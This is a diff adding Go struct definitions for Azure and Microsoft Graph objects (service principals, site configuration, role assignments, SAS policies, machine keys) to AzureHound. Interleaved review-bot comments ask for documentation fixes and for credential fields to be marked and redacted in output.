+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type RoleAssignmentPropertiesWithScope struct {
+ // The principal ID.
+ PrincipalId string `json:"principalId,omitempty"`
+
+ // The role definition ID.
+ RoleDefinitionId string `json:"roleDefinitionId,omitempty"`
+
+ // The role assignment scope.
+ Scope string `json:"scope,omitempty"`
+}
+
+type RoleAssignment struct {
+ // The role assignment ID.
+ Id string `json:"id,omitempty"`
+
+ // The role assignment name.
+ Name string `json:"name,omitempty"`
+
+ // The role assignment type.
+ Type string `json:"type,omitempty"`
+
+ // Role assignment properties
+ Properties RoleAssignmentPropertiesWithScope `json:"properties,omitempty"`
+}
+
+func (s RoleAssignment) GetPrincipalId() string {
+ return s.Properties.PrincipalId
+}
diff --git a/models/azure/role_permission.go b/models/azure/role_permission.go
new file mode 100644
index 0000000..190059d
--- /dev/null
+++ b/models/azure/role_permission.go
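Review bot: `RoleAssignment`, `RoleAssignmentPropertiesWithScope` and `GetPrincipalId` are exported without doc comments, and the method's receiver is named `s` although the type is `RoleAssignment`. I would add `// GetPrincipalId returns the ID of the principal this role assignment applies to.` above the method, a one-line type comment on each struct, and rename the receiver to `r`. The field comments mostly restate the field names; for `Scope` in particular it would help to say what the string contains (presumably a resource ID path, to be confirmed), since the scope is what determines how far an assignment reaches.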
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents a collection of allowed resource actions and the conditions that must be met for the action to be allowed.
+// Resource actions are tasks that can be performed on a resource. For example, an application resource may support
+// create, update, delete, and reset password actions.
+type RolePermission struct {
+ // Set of tasks that can be performed on a resource.
+ //
+ // Required
+ AllowedResourceActions []string `json:"allowedResourceActions,omitempty"`
+
+ // Optional constraints that must be met for the permission to be effective.
+ Condition string `json:"condition,omitempty"`
+
+ // Set of tasks that may not be performed on a resource.
+ // Not yet supported by MS Graph API.
+ ExcludedResourceActions []string `json:"excludedResourceActions,omitempty"`
+}
diff --git a/models/azure/routing_preference.go b/models/azure/routing_preference.go
new file mode 100644
index 0000000..622920a
--- /dev/null
+++ b/models/azure/routing_preference.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type RoutingPreference struct {
+ PublishInternetEndpoints bool `json:"publishInternetEndpoints,omitempty"`
+ PublishMicrosoftEndpoints bool `json:"publishMicrosoftEndpoints,omitempty"`
+ RoutingChoice enums.RoutingChoice `json:"routingChoice,omitempty"`
+}
diff --git a/models/azure/saml_sso_settings.go b/models/azure/saml_sso_settings.go
new file mode 100644
index 0000000..94d54e0
--- /dev/null
+++ b/models/azure/saml_sso_settings.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents a container for settings related to SAML single sign-on.
+type SamlSingleSignOnSettings struct {
+ // The relative URI the service provider would redirect to after completion of the single sign-on flow.
+ RelayState string `json:"relayState,omitempty"`
+}
diff --git a/models/azure/sas_policy.go b/models/azure/sas_policy.go
new file mode 100644
index 0000000..e40609b
--- /dev/null
+++ b/models/azure/sas_policy.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type SasPolicy struct {
+
+ //according to the documentation, this can only be the string "Log"
+ ExpirationAction string `json:"expirationAction,omitempty"`
+ SasExpirationPeriod string `json:"sasExpirationPeriod,omitempty"`
+}
diff --git a/models/azure/scheduled_events_profile.go b/models/azure/scheduled_events_profile.go
new file mode 100644
index 0000000..e9f35f9
--- /dev/null
+++ b/models/azure/scheduled_events_profile.go
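Review bot: The comment on `ExpirationAction` in `SasPolicy` cites "the documentation" without saying which, and `SasExpirationPeriod` has no comment at all, so neither the accepted values nor the period format can be checked from the code. Suggest `// ExpirationAction is the action taken when the SAS expiration period is violated; "Log" was the only documented value when this was written.` and a comment on `SasExpirationPeriod` that states its format (a day/time span string, to be confirmed against the storage account API reference). Anyone auditing SAS token lifetime from this output needs to know how to parse that period. The blank line straight after `type SasPolicy struct {` and the missing space in `//according` are also worth tidying.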
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ScheduledEventsProfile struct {
+ // Specifies Terminate Scheduled Event related configurations.
+ TerminateNotificationProfile TerminateNotificationProfile `json:"terminateNotificationProfile,omitempty"`
+}
diff --git a/models/azure/security_profile.go b/models/azure/security_profile.go
new file mode 100644
index 0000000..64e259d
--- /dev/null
+++ b/models/azure/security_profile.go
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the Security profile settings for the virtual machine or virtual machine scale set.
+type SecurityProfile struct {
+ // This property can be used by user in the request to enable or disable the Host Encryption for the virtual machine
+ // or virtual machine scale set. This will enable the encryption for all the disks including Resource/Temp disk at
+ // host itself.
+ // Default: The Encryption at host will be disabled unless this property is set to true for the resource.
+ EncryptionAtHost bool `json:"encryptionAtHost,omitempty"`
+
+ // Specifies the SecurityType of the virtual machine. It is set as TrustedLaunch to enable UefiSettings.
+ // Default: UefiSettings will not be enabled unless this property is set as TrustedLaunch.
+ SecurityType string `json:"securityType,omitempty"`
+
+ // Specifies the security settings like secure boot and vTPM used while creating the virtual machine.
+ // Minimum api-version: 2020-12-01
+ UefiSettings UefiSettings `json:"uefiSettings,omitempty"`
+}
diff --git a/models/azure/service_principal.go b/models/azure/service_principal.go
new file mode 100644
index 0000000..5ba521b
--- /dev/null
+++ b/models/azure/service_principal.go
@@ -0,0 +1,179 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Represents an instance of an application in a directory.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/serviceprincipal?view=graph-rest-1.0
+type ServicePrincipal struct {
+ DirectoryObject
+
+ // true if the service principal account is enabled; otherwise, false.
+ // Supports $filter (eq, ne, NOT, in).
+ AccountEnabled bool `json:"accountEnabled,omitempty"`
+
+ // Defines custom behavior that a consuming service can use to call an app in specific contexts.
+ // For example, applications that can render file streams may set the addIns property for its "FileHandler"
+ // functionality. This will let services like Microsoft 365 call the application in the context of a document the
+ // user is working on.
+ AddIns []AddIn `json:"addIns,omitempty"`
+
+ // Used to retrieve service principals by subscription, identify resource group and full resource ids for managed
+ // identities.
+ // Supports $filter (eq, NOT, ge, le, startsWith).
+ AlternativeNames []string `json:"alternativeNames,omitempty"`
+
+ // The description exposed by the associated application.
+ AppDescription string `json:"appDescription,omitempty"`
+
+ // The display name exposed by the associated application.
+ AppDisplayName string `json:"appDisplayName,omitempty"`
+
+ // The unique identifier for the associated application (its appId property).
+ AppId string `json:"appId,omitempty"`
+
+ // Unique identifier of the applicationTemplate that the servicePrincipal was created from.
+ // Read-only.
+ // Supports $filter (eq, ne, NOT, startsWith).
+ ApplicationTemplateId string `json:"applicationTemplateId,omitempty"`
+
+ // Contains the tenant id where the application is registered.
+ // This is applicable only to service principals backed by applications.
+ // Supports $filter (eq, ne, NOT, ge, le).
+ AppOwnerOrganizationId string `json:"appOwnerOrganizationId,omitempty"`
+
+ // Specifies whether users or other service principals need to be granted an app role assignment for this service
+ // principal before users can sign in or apps can get tokens.
+ // The default value is false.
+ // Not nullable.
+ // Supports $filter (eq, ne, NOT).
+ AppRoleAssignmentRequired bool `json:"appRoleAssignmentRequired,omitempty"`
+
+ // The roles exposed by the application which this service principal represents.
+ // For more information see the appRoles property definition on the application entity.
+ // Not nullable.
+ AppRoles []AppRole `json:"appRoles,omitempty"`
+
+ // The date and time the service principal was deleted.
+ // Read-only.
+ DeletedDateTime string `json:"deletedDateTime,omitempty"`
+
+ // Free text field to provide an internal end-user facing description of the service principal.
+ // End-user portals such MyApps will display the application description in this field.
+ // The maximum allowed size is 1024 characters.
+ // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search.
+ Description string `json:"description,omitempty"`
+
+ // Specifies whether Microsoft has disabled the registered application.
+ // Possible values are: null (default value), NotDisabled, and DisabledDueToViolationOfServicesAgreement
+ // (reasons may include suspicious, abusive, or malicious activity, or a violation of the Microsoft Services
+ // Agreement).
+ // Supports $filter (eq, ne, NOT).
+ DisabledByMicrosoftStatus string `json:"disabledByMicrosoftStatus,omitempty"`
+
+ // The display name for the service principal.
+ // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // Home page or landing page of the application.
+ Homepage string `json:"homepage,omitempty"`
+
+ // Basic profile information of the acquired application such as app's marketing, support, terms of service and
+ // privacy statement URLs. The terms of service and privacy statement are surfaced to users through the user consent
+ // experience.
+ // Supports $filter (eq, ne, NOT, ge, le).
+ Info InformationalUrl `json:"info,omitempty"`
+
+ // The collection of key credentials associated with the service principal.
+ // Not nullable.
+ // Supports $filter (eq, NOT, ge, le).
+ KeyCredentials []KeyCredential `json:"keyCredentials,omitempty"`
+
+ // Specifies the URL where the service provider redirects the user to Azure AD to authenticate.
+ // Azure AD uses the URL to launch the application from Microsoft 365 or the Azure AD My Apps. When blank, Azure AD
+ // performs IDP-initiated sign-on for applications configured with SAML-based single sign-on. The user launches the
+ // application from Microsoft 365, the Azure AD My Apps, or the Azure AD SSO URL.
+ LoginUrl string `json:"loginUrl,omitempty"`
+
+ // Specifies the URL that will be used by Microsoft's authorization service to logout an user using OpenId Connect
+ // front-channel, back-channel or SAML logout protocols.
+ LogoutUrl string `json:"logoutUrl,omitempty"`
+
+ // Free text field to capture information about the service principal, typically used for operational purposes.
+ // Maximum allowed size is 1024 characters.
+ Notes string `json:"notes,omitempty"`
+
+ // Specifies the list of email addresses where Azure AD sends a notification when the active certificate is near the
+ // expiration date. This is only for the certificates used to sign the SAML token issued for Azure AD Gallery
+ // applications.
+ NotificationEmailAddresses []string `json:"notificationEmailAddresses,omitempty"`
+
+ // The delegated permissions exposed by the application.
+ OAuth2PermissionScopes []PermissionScope `json:"oauth2PermissionScopes,omitempty"`
+
+ // The collection of password credentials associated with the application.
+ // Not nullable.
+ PasswordCredentials []PasswordCredential `json:"passwordCredentials,omitempty"`
+
+ // Specifies the single sign-on mode configured for this application.
+ // Azure AD uses the preferred single sign-on mode to launch the application from Microsoft 365 or the Azure AD My Apps.
+ // The supported values are password, saml, notSupported, and oidc.
+ PreferredSingleSignOnMode string `json:"preferredSingleSignOnMode,omitempty"`
+
+ // The URLs that user tokens are sent to for sign in with the associated application, or the redirect URIs that
+ // OAuth 2.0 authorization codes and access tokens are sent to for the associated application.
+ // Not nullable.
+ ReplyUrls []string `json:"replyUrls,omitempty"`
+
+ // The collection for settings related to saml single sign-on.
+ SamlSingleSignOnSettings SamlSingleSignOnSettings `json:"samlSingleSignOnSettings,omitempty"`
+
+ // Contains the list of identifiersUris, copied over from the associated application.
+ // Additional values can be added to hybrid applications.
+ // These values can be used to identify the permissions exposed by this app within Azure AD.
+ // For example, Client apps can specify a resource URI which is based on the values of this property to acquire an
+ // access token, which is the URI returned in the “aud” claim.
+ // The any operator is required for filter expressions on multi-valued properties.
+ // Not nullable.
+ // Supports $filter (eq, NOT, ge, le, startsWith).
+ ServicePrincipalNames []string `json:"servicePrincipalNames,omitempty"`
+
+ // Identifies whether the service principal represents an application, a managed identity, or a legacy application.
+ // This is set by Azure AD internally.
+ ServicePrincipalType enums.ServicePrincipalType `json:"servicePrincipalType,omitempty"`
+
+ // Specifies the Microsoft accounts that are supported for the current application.
+ // Read-only.
+ SignInAudience enums.SigninAudience `json:"signInAudience,omitempty"`
+
+ // Custom strings that can be used to categorize and identify the service principal. Not nullable.
+ // Supports $filter (eq, NOT, ge, le, startsWith).
+ Tags []string `json:"tags,omitempty"`
+
+ // Specifies the keyId of a public key from the keyCredentials collection.
+ // When configured, Azure AD issues tokens for this application encrypted using the key specified by this property.
+ // The application code that receives the encrypted token must use the matching private key to decrypt the token
+ // before it can be used for the signed-in user.
+ TokenEncryptionKeyId string `json:"tokenEncryptionKeyId,omitempty"`
+
+ // Specifies the verified publisher of the application which this service principal represents.
+ VerifiedPublisher VerifiedPublisher `json:"verifiedPublisher,omitempty"`
+}
diff --git a/models/azure/site_config.go b/models/azure/site_config.go
new file mode 100644
index 0000000..ad1b4a8
--- /dev/null
+++ b/models/azure/site_config.go
@@ -0,0 +1,152 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type SiteConfig struct {
+ AcrUseManagedIdentityCreds bool `json:"acrUseManagedIdentityCreds,omitempty"`
+ AcrUserManagedIdentityID string `json:"acrUserManagedIdentityID,omitempty"`
+ AlwaysOn bool `json:"alwaysOn,omitempty"`
+ ApiDefinition ApiDefinitionInfo `json:"apiDefinition,omitempty"`
+ ApiManagementConfig ApiManagementConfig `json:"apiManagementConfig,omitempty"`
+ AppCommandLine string `json:"appCommandLine,omitempty"`
+ AppSettings []NameValuePair `json:"appSettings,omitempty"`
+ AutoHealEnabled bool `json:"autoHealEnabled,omitempty"`
+ AutoHealRules string `json:"autoHealRules,omitempty"`
+ AutoSwapSlotName string `json:"autoSwapSlotName,omitempty"`
+ AzureStorageAccounts map[string]AzureStorageInfoValue `json:"azureStorageAccounts,omitempty"`
+ ConnectionStrings []ConnStringInfo `json:"connectionStrings,omitempty"`
+ Cors CorsSettings `json:"cors,omitempty"`
+ DefaultDocuments []string `json:"defaultDocuments,omitempty"`
+ DetailedErrorLoggingEnabled bool `json:"detailedErrorLoggingEnabled,omitempty"`
+ DocumentRoot string `json:"documentRoot,omitempty"`
+ Experiments Experiments `json:"experiments,omitempty"`
+ FtpsState enums.FtpsState `json:"ftpsState,omitempty"`
+ FunctionAppScaleLimit int `json:"functionAppScaleLimit,omitempty"`
+ FunctionsRuntimeScaleMonitoringEnabled bool `json:"functionsRuntimeScaleMonitoringEnabled,omitempty"`
+ HandlerMappings []HandlerMapping `json:"handlerMappings,omitempty"`
+ HealthCheckPath string `json:"healthCheckPath,omitempty"`
+ Http20Enabled bool `json:"http20Enabled,omitempty"`
+ HttpLoggingEnabled bool `json:"httpLoggingEnabled,omitempty"`
+ IpSecurityRestrictions []IpSecurityRestriction `json:"ipSecurityRestrictions,omitempty"`
+ JavaContainer string `json:"javaContainer,omitempty"`
+ JavaContainerVersion string `json:"javaContainerVersion,omitempty"`
+ JavaVersion string `json:"javaVersion,omitempty"`
+ KeyVaultReferenceIdentity string `json:"keyVaultReferenceIdentity,omitempty"`
+ Limits SiteLimits `json:"limits,omitempty"`
+ LinuxFxVersion string `json:"linuxFxVersion,omitempty"`
+ LoadBalancing enums.SiteLoadBalancing `json:"loadBalancing,omitempty"`
+ LocalMySqlEnabled bool `json:"localMySqlEnabled,omitempty"`
+ LogsDirectorySizeLimit int `json:"logsDirectorySizeLimit,omitempty"`
+ MachineKey SiteMachineKey `json:"machineKey,omitempty"`
+ ManagedPipelineMode enums.ManagedPipelineMode `json:"managedPipelineMode,omitempty"`
+ ManagedServiceIdentityId int `json:"managedServiceIdentityId,omitempty"`
+ MinTlsVersion enums.SupportedTlsVersions `json:"minTlsVersion,omitempty"`
+ MinimumElasticInstanceCount int `json:"minimumElasticInstanceCount,omitempty"`
+ NetFrameworkVersion string `json:"netFrameworkVersion,omitempty"`
+ NodeVersion string `json:"nodeVersion,omitempty"`
+ NumberOfWorkers int `json:"numberOfWorkers,omitempty"`
+ PhpVersion string `json:"phpVersion,omitempty"`
+ PowerShellVersion string `json:"powerShellVersion,omitempty"`
+ PreWarmedInstanceCount int `json:"preWarmedInstanceCount,omitempty"`
+ PublicNetworkAccess string `json:"publicNetworkAccess,omitempty"`
+ PublishingUsername string `json:"publishingUsername,omitempty"`
+ Push PushSettings `json:"push,omitempty"`
+ PythonVersion string `json:"pythonVersion,omitempty"`
+ RemoteDebuggingEnabled bool `json:"remoteDebuggingEnabled,omitempty"`
+ RemoteDebuggingVersion string `json:"remoteDebuggingVersion,omitempty"`
+ RequestTracingEnabled bool `json:"requestTracingEnabled,omitempty"`
+ RequestTracingExpirationTime string `json:"requestTracingExpirationTime,omitempty"`
+ ScmIpSecurityRestrictions []IpSecurityRestriction `json:"scmIpSecurityRestrictions,omitempty"`
+ ScmIpSecurityRestrictionsUseMain bool `json:"scmIpSecurityRestrictionsUseMain,omitempty"`
+ ScmMinTlsVersion enums.SupportedTlsVersions `json:"scmMinTlsVersion,omitempty"`
+ ScmType enums.ScmType `json:"scmType,omitempty"`
+ TracingOptions string `json:"tracingOptions,omitempty"`
+ Use32BitWorkerProcess bool `json:"use32BitWorkerProcess,omitempty"`
+ VirtualApplications []VirtualApplication `json:"virtualApplications,omitempty"`
+ VnetName string `json:"vnetName,omitempty"`
+ VnetPrivatePortsCount int `json:"vnetPrivatePortsCount,omitempty"`
+ VnetRouteAllEnabled bool `json:"vnetRouteAllEnabled,omitempty"`
+ WebSocketsEnabled bool `json:"webSocketsEnabled,omitempty"`
+ WebsiteTimeZone string `json:"websiteTimeZone,omitempty"`
+ WindowsFxVersion string `json:"windowsFxVersion,omitempty"`
+ XManagedServiceIdentityId int `json:"xManagedServiceIdentityId,omitempty"`
+
+ //Following ones have been found in testing, but not present in the documentation
+ AntivirusScanEnabled bool `json:"antivirusScanEnabled,omitempty"`
+ AzureMonitorLogCategories interface{} `json:"azureMonitorLogCategories,omitempty"`
+ CustomAppPoolIdentityAdminState interface{} `json:"customAppPoolIdentityAdminState,omitempty"`
+ CustomAppPoolIdentityTenantState interface{} `json:"customAppPoolIdentityTenantState,omitempty"`
+ ElasticWebAppScaleLimit interface{} `json:"elasticWebAppScaleLimit,omitempty"`
+ FileChangeAuditEnabled bool `json:"fileChangeAuditEnabled,omitempty"`
+ Http20ProxyFlag interface{} `json:"http20ProxyFlag,omitempty"`
+ IpSecurityRestrictionsDefaultAction interface{} `json:"ipSecurityRestrictionsDefaultAction,omitempty"`
+ Metadata interface{} `json:"metadata,omitempty"`
+ MinTlsCipherSuite interface{} `json:"minTlsCipherSuite,omitempty"`
+ PublishingPassword interface{} `json:"publishingPassword,omitempty"`
+ RoutingRules interface{} `json:"routingRules,omitempty"`
+ RuntimeADUser interface{} `json:"runtimeADUser,omitempty"`
+ RuntimeADUserPassword interface{} `json:"runtimeADUserPassword,omitempty"`
+ ScmIpSecurityRestrictionsDefaultAction interface{} `json:"scmIpSecurityRestrictionsDefaultAction,omitempty"`
+ SitePort interface{} `json:"sitePort,omitempty"`
+ StorageType interface{} `json:"storageType,omitempty"`
+ SupportedTlsCipherSuites interface{} `json:"supportedTlsCipherSuites,omitempty"`
+ WinAuthAdminState interface{} `json:"winAuthAdminState,omitempty"`
+ WinAuthTenantState interface{} `json:"winAuthTenantState,omitempty"`
+}
+
+type ApiDefinitionInfo struct {
+ Url string `json:"url,omitempty"`
+}
+
+type ApiManagementConfig struct {
+ Id string `json:"id,omitempty"`
+}
+
+type CorsSettings struct {
+ AllowedOrigins []string `json:"allowedOrigins,omitempty"`
+ SupportCredentials bool `json:"supportCredentials,omitempty"`
+}
+
+type Experiments struct {
+ RampUpRules []RampUpRule `json:"rampUpRules,omitempty"`
+}
+
+type RampUpRule struct {
+ ActionHostName string `json:"actionHostName,omitempty"`
+ ChangeDecisionCallbackUrl string `json:"changeDecisionCallbackUrl,omitempty"`
+ ChangeIntervalInMinutes int `json:"changeIntervalInMinutes,omitempty"`
+ ChangeStep int `json:"changeStep,omitempty"`
+ MaxReroutePercentage int `json:"maxReroutePercentage,omitempty"`
+ MinReroutePercentage int `json:"minReroutePercentage,omitempty"`
+ Name string `json:"name,omitempty"`
+ ReroutePercentage int `json:"reroutePercentage,omitempty"`
+}
+
+type HandlerMapping struct {
+ Arguments string `json:"arguments,omitempty"`
+ Extension string `json:"extension,omitempty"`
+ ScriptProcessor string `json:"scriptProcessor,omitempty"`
+}
+
+type SiteLimits struct {
+ MaxDiskSizeInMb int `json:"maxDiskSizeInMb,omitempty"`
+ MaxMemoryInMb int `json:"maxMemoryInMb,omitempty"`
+ MaxPercentageCpu int `json:"maxPercentageCpu,omitempty"`
+}
diff --git a/models/azure/site_machine_key.go b/models/azure/site_machine_key.go
new file mode 100644
index 0000000..09af250
--- /dev/null
+++ b/models/azure/site_machine_key.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type SiteMachineKey struct {
+ Decryption string `json:"decryption,omitempty"`
+ DecryptionKey string `json:"decryptionKey,omitempty"`
+ Validation string `json:"validation,omitempty"`
+ ValidationKey string `json:"validationKey,omitempty"`
+}
diff --git a/models/azure/sku.go b/models/azure/sku.go
new file mode 100644
index 0000000..960bc27
--- /dev/null
+++ b/models/azure/sku.go
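Review bot: `SiteConfig` models credential material as ordinary serialisable fields (`PublishingPassword`, `RuntimeADUserPassword`, `ConnectionStrings`, `AppSettings`, and `MachineKey`, whose `DecryptionKey`/`ValidationKey` are declared in models/azure/site_machine_key.go in the next hunk) with nothing marking them as sensitive. Whether the API populates them depends on the endpoint and the caller's permissions, which these hunks do not show, but any value that does arrive is carried into whatever the struct is later marshalled or logged to. I would put a comment on each of these fields, e.g. `// May contain a credential; redact before writing output or logs.`, and have the output path clear them unless the operator explicitly asks for them. The fields under the "found in testing" comment are all typed `interface{}`; concrete types (or at least `any` plus a note on the observed value shape) would make that block reviewable.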
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// SKU details
+type Sku struct {
+ // The SKU family name. Only available option is "A"
+ Family string `json:"family,omitempty"`
+
+ // SKU name to specify whether the key vault is a standard vault or a premium vault.
+ Name enums.VaultSku `json:"name,omitempty"`
+}
diff --git a/models/azure/slot_swap_status.go b/models/azure/slot_swap_status.go
new file mode 100644
index 0000000..6801b27
--- /dev/null
+++ b/models/azure/slot_swap_status.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type SlotSwapStatus struct {
+ DestinationSlotName string `json:"destinationSlotName,omitempty"`
+ SourceSlotName string `json:"sourceSlotName,omitempty"`
+ TimestampUtc string `json:"timestampUtc,omitempty"`
+}
diff --git a/models/azure/spa_application.go b/models/azure/spa_application.go
new file mode 100644
index 0000000..40817f0
--- /dev/null
+++ b/models/azure/spa_application.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies settings for a single-page application.
+type SPAApplication struct {
+ // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization
+ // codes and access tokens are sent.
+ RedirectUris []string `json:"redirectUris,omitempty"`
+}
diff --git a/models/azure/ssh_config.go b/models/azure/ssh_config.go
new file mode 100644
index 0000000..c7dcad5
--- /dev/null
+++ b/models/azure/ssh_config.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// SSH configuration for Linux based VMs running on Azure.
+type SshConfiguration struct {
+ // The list of SSH public keys used to authenticate with linux based VMs.
+ PublicKeys []SshPublicKey `json:"publicKeys,omitempty"`
+}
diff --git a/models/azure/ssh_public_key.go b/models/azure/ssh_public_key.go
new file mode 100644
index 0000000..17d8ff2
--- /dev/null
+++ b/models/azure/ssh_public_key.go
@@ -0,0 +1,30 @@
